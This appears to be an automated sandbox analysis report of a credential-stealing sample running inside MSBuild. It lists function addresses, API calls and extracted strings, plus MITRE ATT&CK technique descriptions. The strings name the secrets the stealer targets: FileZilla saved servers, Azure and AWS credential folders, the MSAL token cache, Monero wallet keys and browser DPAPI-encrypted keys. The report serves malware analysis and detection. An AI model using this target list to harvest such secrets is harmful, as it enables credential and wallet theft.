Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6

Function 00401110 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualAllocExNuma.KERNELBASE(00000000,?,?,00416A1C), ref: 00401132

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AllocNumaVirtual
String ID:
API String ID: 4233825816-0
Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699

Function 004010A0 Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4

Non-executed Functions

Function 0041B33A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041BBA2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
TerminateProcess.KERNEL32(00000000), ref: 0041BBE5

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D

Function 00410250 Relevance: 26.6, APIs: 3, Strings: 12, Instructions: 363stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0041031B
memset.MSVCRT ref: 004106DD

Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903

strtok_s.MSVCRT ref: 00410679

Strings

url: , xrefs: 00410577
password: , xrefs: 004105FB
<Port>, xrefs: 004103C6
NA, xrefs: 004102CC, 004102F2, 004102CF, 004102F5
browser: FileZilla, xrefs: 00410559
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 004102A4
profile: null, xrefs: 00410568
login: , xrefs: 004105CA
<Host>, xrefs: 0041037C
<User>, xrefs: 00410410
<Pass encoding="base64">, xrefs: 0041045A
NA, xrefs: 0041072E, 004106AF, 004106B2

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: strtok_s$mallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 2676359353-514892060
Opcode ID: 5617bd6bc83757f25327082bfbfb60fa8d0a6348b7b524702c500f70768eef60
Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
Opcode Fuzzy Hash: 5617bd6bc83757f25327082bfbfb60fa8d0a6348b7b524702c500f70768eef60
Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69

Function 00410A60 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 205stringprocesssynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410C1C
lstrcatA.KERNEL32(?,00000000), ref: 00410C35
lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
lstrcatA.KERNEL32(?,00000000), ref: 00410C88
lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
lstrlenA.KERNEL32(?), ref: 00410CA7
memset.MSVCRT ref: 00410CCD
memset.MSVCRT ref: 00410CE1
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66

Strings

.exe, xrefs: 00410A95

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$memset$CreateObjectProcessSingleWaitlstrlen
String ID: .exe
API String ID: 2214552867-4119554291
Opcode ID: 6364e5e739fe9739766a1ce8d8c7e5a183e8e2bdcb2e6e6671a0d6d634042010
Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
Opcode Fuzzy Hash: 6364e5e739fe9739766a1ce8d8c7e5a183e8e2bdcb2e6e6671a0d6d634042010
Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E

Function 00414D70 Relevance: 21.1, APIs: 4, Strings: 10, Instructions: 119COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00414D87
memset.MSVCRT ref: 00414E13
memset.MSVCRT ref: 00414E9F
memset.MSVCRT ref: 00414F2B

Strings

msal.cache, xrefs: 00414EF0
\.azure\, xrefs: 00414DC1
Azure\.IdentityService, xrefs: 00414EEB
zaA, xrefs: 00414DF1, 00414E7D, 00414F09, 00414F34, 00414DF4, 00414E80, 00414F0C
\.aws\, xrefs: 00414E4D
Azure\.aws, xrefs: 00414E5F
Azure\.azure, xrefs: 00414DD3
*.*, xrefs: 00414DD8
*.*, xrefs: 00414E64
\.IdentityService\, xrefs: 00414ED9

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: memset
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
API String ID: 2221118986-156832076
Opcode ID: 63500b277e5d8c6ba40ed9413d1edfa83572fad66260e383529a6b6b95d2c298
Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
Opcode Fuzzy Hash: 63500b277e5d8c6ba40ed9413d1edfa83572fad66260e383529a6b6b95d2c298
Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A

Function 004170D0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
memset.MSVCRT ref: 0041716A
??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE

Strings

sA, xrefs: 00417111
sA, xrefs: 004172AE, 00417179, 0041717C
65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: OpenProcessmemset
String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 1606381396-2614523144
Opcode ID: a73ac6e1bb2c91b578430d02177e5a2f8beb51943881740cc90b8311f986bdaf
Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
Opcode Fuzzy Hash: a73ac6e1bb2c91b578430d02177e5a2f8beb51943881740cc90b8311f986bdaf
Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D

Function 004138B0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 250COMMON

Download Yara Rule

Strings

%s\%s\%s, xrefs: 00413A4A
%s\%s, xrefs: 00413A6F
%s\%s, xrefs: 0041397A
%s\*, xrefs: 004138C0
!=A, xrefs: 00413C82, 00413C45, 00413B69, 00413909, 00413B6C, 00413C48
%s%s, xrefs: 00413AAD

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 0-817767981
Opcode ID: c3ad0e5f37a6afd264e19c98f003c489031be70fef7a74d9d5741692706db697
Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
Opcode Fuzzy Hash: c3ad0e5f37a6afd264e19c98f003c489031be70fef7a74d9d5741692706db697
Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66

Function 00405960 Relevance: 11.0, APIs: 2, Strings: 5, Instructions: 493COMMON

Download Yara Rule

APIs

Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849

memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
memcpy.MSVCRT(?), ref: 00405EFE

Strings

------, xrefs: 00405D4C
------, xrefs: 00405C0B
", xrefs: 00405E16
", xrefs: 00405CD5
------, xrefs: 00405A96

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: ??2@$memcpy$CrackInternet
String ID: "$"$------$------$------
API String ID: 4271525049-2180234286
Opcode ID: 4205a6c64491eede6f2c0190817c01b6d1188d899bee5cc8d5380a99dbe7c93c
Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
Opcode Fuzzy Hash: 4205a6c64491eede6f2c0190817c01b6d1188d899bee5cc8d5380a99dbe7c93c
Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69

Function 00409E10 Relevance: 10.7, APIs: 3, Strings: 4, Instructions: 167COMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D

Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F

memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
memset.MSVCRT ref: 00409EE8

Strings

v20, xrefs: 00409E21
v10, xrefs: 00409EA3
ERROR_RUN_EXTRACTOR, xrefs: 00409E67
@, xrefs: 00409EF1

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$memcmpmemset
String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 1976689032-1096346117
Opcode ID: cf3bd8b6a91d7380b4fcfdc4a2eaf8d3038d72e2fe7c69aa23c32b41aba9b41f
Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
Opcode Fuzzy Hash: cf3bd8b6a91d7380b4fcfdc4a2eaf8d3038d72e2fe7c69aa23c32b41aba9b41f
Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A

Function 00401310 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 139COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401327
memset.MSVCRT ref: 00401516

Strings

SOFTWARE\monero-project\monero-core, xrefs: 00401335
.keys, xrefs: 0040136B
\Monero\wallet.keys, xrefs: 0040138D
wallet_path, xrefs: 00401330

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: memset
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 2221118986-218353709
Opcode ID: a32f2aae1de9b97ae466325f1f020e6fdbbafcfcec33de046a9004802322f3a2
Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
Opcode Fuzzy Hash: a32f2aae1de9b97ae466325f1f020e6fdbbafcfcec33de046a9004802322f3a2
Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA

Function 004152C0 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 138stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000,00420DFB), ref: 004062E1
Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,?,00000000,00000000,00400100,00000000), ref: 00406385
Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1

strtok.MSVCRT(00000000,?), ref: 0041539E

Strings

ERROR, xrefs: 004154A9
ERROR, xrefs: 0041546F
ERROR, xrefs: 0041530A
ERROR, xrefs: 004153B9
ERROR, xrefs: 00415432

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: HttpInternetOpenRequest$ConnectSendstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 1208788097-1526165396
Opcode ID: 4a2ea036609cd15b672270c35ab07a18dfd7f62b3a06473966441f12aab465d2
Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
Opcode Fuzzy Hash: 4a2ea036609cd15b672270c35ab07a18dfd7f62b3a06473966441f12aab465d2
Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A

Function 0041B38C Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 0041B39A

Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6

DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7

Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37

DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE

Function 0041C9DE Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041C9EA

Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF

__amsg_exit.LIBCMT ref: 0041CA0A
__lock.LIBCMT ref: 0041CA1A
InterlockedDecrement.KERNEL32(?), ref: 0041CA37
free.MSVCRT ref: 0041CA4A
InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
String ID:
API String ID: 634100517-0
Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD

Function 00416F00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00416F1F
??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D

Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05

VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3

Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8

Strings

@, xrefs: 00416FA6

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: @
API String ID: 2950663791-2766056989
Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5

Function 0041C742 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041C74E

Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF

__getptd.LIBCMT ref: 0041C765
__amsg_exit.LIBCMT ref: 0041C773
__lock.LIBCMT ref: 0041C783
__updatetlocinfoEx_nolock.LIBCMT ref: 0041C797

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E

Function 00418100 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00418172
__aulldiv.LIBCMT ref: 00418180

Strings

%d MB, xrefs: 004181A3
@, xrefs: 0041814D

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: __aulldiv
String ID: %d MB$@
API String ID: 3732870572-3474575989
Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9

Function 00409CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92

Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6

Strings

, xrefs: 00409DC1
"encrypted_key":", xrefs: 00409D30
DPAPI, xrefs: 00409D89

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: memcmpmemcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 1784268899-738592651
Opcode ID: 858bb5d36e7e37b9704747d5b8cf33c67ecf781cccc3ca8f5e8d480075c2e052
Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
Opcode Fuzzy Hash: 858bb5d36e7e37b9704747d5b8cf33c67ecf781cccc3ca8f5e8d480075c2e052
Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5

Function 004072D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407314
task.LIBCPMTD ref: 00407555

Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B

Strings

Password, xrefs: 00407401

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: memsettaskvsprintf_s
String ID: Password
API String ID: 2675463923-3434357891
Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

